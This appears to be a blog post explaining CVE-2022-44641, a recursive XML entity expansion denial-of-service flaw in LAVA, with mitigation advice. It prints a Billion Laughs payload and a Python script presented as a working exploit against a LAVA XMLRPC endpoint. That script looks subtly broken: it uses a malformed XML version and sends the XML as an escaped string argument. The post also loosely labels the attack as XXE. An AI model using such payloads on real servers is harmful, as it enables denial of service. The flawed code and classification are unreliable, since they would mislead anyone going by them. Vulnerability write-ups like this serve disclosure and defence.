Recently, a critical vulnerability (CVE-2022-44641) was discovered in the Linaro Automated Validation Architecture (LAVA) software that allows attackers to cause a recursive XML entity expansion, resulting in excessive use of memory on the server and a Denial of Service (DoS). In this post, we will take a deep dive into the vulnerability, understanding the exploit, and discussing ways to mitigate the issue.
Understanding the Vulnerability
The vulnerability affects LAVA versions before 2022.11. In these versions, users with valid credentials can create and submit an XMLRPC request that contains a crafted XML payload. This payload causes recursive XML entity expansion, leading to memory exhaustion on the server and rendering the service unavailable.
Original References
- LAVA Homepage: https://www.lavasoftware.org/
- CVE details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44641
Recap of XML Entity Expansion Attack
An XML Entity Expansion attack, also known as the Billion Laughs attack, is a type of XML External Entity (XXE) injection attack. The attacker creates a payload with a structure similar to:
<!DOCTYPE root [
<!ENTITY a "DUMMY_DATA">
<!ENTITY b "&a;&a;&a;&a;">
<!ENTITY c "&b;&b;&b;&b;">
]>
<root>
&c;
</root>
Here, "DUMMY_DATA" is expanded recursively through the &b; and &c; entities, eventually causing an excessive use of memory. This consumes resources on the target server, eventually leading to a denial of service.
Consider the following Python code snippet, which demonstrates how to exploit the vulnerability
import xmlrpc.client
# Replace the example values with target server credentials.
lava_url = "http://example.com/RPC2";
username = "my_username"
token = "my_token"
# Create an XML payload containing recursive entities.
xml_payload = """<?xml version="1."?>
<!DOCTYPE request [
<!ENTITY a "DUMMY_DATA">
<!ENTITY b "&a;&a;&a;&a;">
<!ENTITY c "&b;&b;&b;&b;">
]>
<methodCall>
<methodName>valid_method</methodName>
<params>
<param><value><string>%s</string></value></param>
<param><value><string>&c;</string></value></param>
</params>
</methodCall>
""" % token
# Send the malicious XMLRPC request to the server.
proxy = xmlrpc.client.ServerProxy(lava_url, allow_none=True)
result = proxy.system.multicall(xml_payload)
print(result)
The example above crafts a malicious XML payload and sends it as a valid XMLRPC request to a LAVA instance using valid user credentials. Upon receiving such a request, the LAVA server will suffer from a recursion issue, causing memory exhaustion and forcing server interruption.
Mitigation
If you are running a LAVA instance, it is important to apply the patch released with version 2022.11 as soon as possible. Upgrade your current LAVA instance to the latest version following the official documentation: https://docs.lavasoftware.org/lava/upgrading.html
Additionally, to protect against XML Entity Expansion attacks in general, consider the following best practices:
Disable XML External Entity processing in your XML parser.
2. Implement resource limits on XML parsers to prevent the processing of documents exceeding specified limits.
Conclusion
The CVE-2022-44641 vulnerability poses a significant risk to LAVA instances before version 2022.11, allowing malicious users to submit crafted XMLRPC requests that can exhaust server resources and cause a Denial of Service. We strongly advise you to upgrade to the latest version of LAVA and implement the recommended best practices to mitigate any potential risk.
Timeline
Published on: 11/18/2022 21:15:00 UTC
Last modified on: 02/01/2023 16:16:00 UTC